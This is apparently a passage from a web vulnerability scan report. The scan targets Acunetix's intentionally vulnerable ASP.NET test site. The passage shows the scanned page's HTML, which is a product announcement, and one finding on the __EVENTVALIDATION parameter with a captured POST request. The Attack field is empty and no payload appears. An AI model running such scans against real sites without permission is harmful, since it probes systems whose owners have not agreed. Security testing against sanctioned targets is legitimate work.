CAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc+PC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk+PGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk+IDwvdWw+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYEHgRUZXh0BRJSZWFkIHVzZXIgY29tbWVudHMeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTJkZAILDxYCHgNzcmNkZGQMFEFD4s6E4+L8NgEI5fU11kxKVg==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKsmpfVDAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBMM7CCcDz0WSHUDA7sLxpWzaC0J1" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:35:22 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix Web Vulnerability Scanner 2 </strong></p> <p>21 July 2005 - <strong>Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</strong> </p> <p><strong>Securing your website should be your number one concern</strong><br /> Hackers are concentrating their efforts on web-based applications - 75% of cyber attacks are done at the web application level, a Gartner Group study has revealed. Web applications are accessible 24 hours a day, 7 days a week and control valuable data such as customer information, transaction information and even proprietary corporate data.</p> <p><strong>500,000 customer credit card numbers obtained via a web attack</strong><br /> Well-known sites that were open to web application attacks include fashion label Guess and pet supply retailer PetCo.com who were notoriously found to be vulnerable to the SQL injection vulnerability (June 2003). This resulted in PetCo leaving as many as 500,000 credit card numbers open to anyone able to construct this specially-crafted URL.</p> <p><strong>Firewalls, SSL and locked-down servers are futile against web application hacking</strong><br /> Any defense at network security level will provide no protection against web application attacks since they are launched on port 80 - which has to remain open. In addition, web applications (customer areas, shopping carts etc.) are often tailor-made, invariably tested less than off-the-shelf software and are therefore more susceptible to attack.</p> <p>"Companies have implemented network-level security, however they fail to audit and secure their web applications. These applications have access to sensitive data and are a hacker's prime target," said Nick Galea, CEO of Acunetix. "Auditing one's web apps should be the number one security concern."</p> <p><strong>The need for an automated web application vulnerability scanner</strong><br /> Manually auditing a web application for vulnerabilities to SQL injection, cross site scripting and other web attacks is virtually impossible. With Acunetix Web Vulnerability Scanner the process of auditing web applications such as shopping carts and forms, can be easily automated. What's more, the security checks can easily be re-launched for each application update.</p> <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br /> Acunetix WVS first crawls the whole website, analyzes in-depth each file it finds, and displays the entire website structure. After this discovery stage, it performs an automatic audit for common security vulnerabilities.</p> <p><strong>Automatically detects SQL injection, cross site scripting and other web vulnerabilities</strong><br /> SQL injection is a hacking technique which modifies SQL commands in order to gain access to data in the database. Cross site scripting attacks allow a hacker to execute a malicious script on your visitors' browser. Acunetix Web Vulnerability Scanner can check if your web application is vulnerable to both of these attacks. More information about cross site scripting & SQL injection at our website security info page.</p> <p><strong>Acunetix Web Vulnerability Scanner also checks for the following web attacks:</strong></p> <ul> <li>CRLF injection attacks<br /> </li><li>Code execution attacks<br /> </li><li>Directory traversal attacks<br /> </li><li>File inclusion attacks<br /> </li><li> Input validation attacks<br /> </li><li>Authentication attacks.</li> </ul> <p><strong>Advanced penetration testing tools</strong><br /> Acunetix WVS also includes tools such as an HTTP editor & HTTP sniffer to allow customization of web vulnerability checks. Using the Vulnerability editor, new attacks can easily be created.</p> <p><strong>Pricing & availability</strong><br /> Acunetix WVS is available as an enterprise or as a consultant version. A subscription based license can be purchased for as little as $395, whereas a perpetual license starts at $2995. For more information visit our pricing page.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?id=3
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 421 bytes.	POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=3 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?id=3 Content-Length: 3743 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 3,743 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8%2BaGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BQWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A%2BICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlc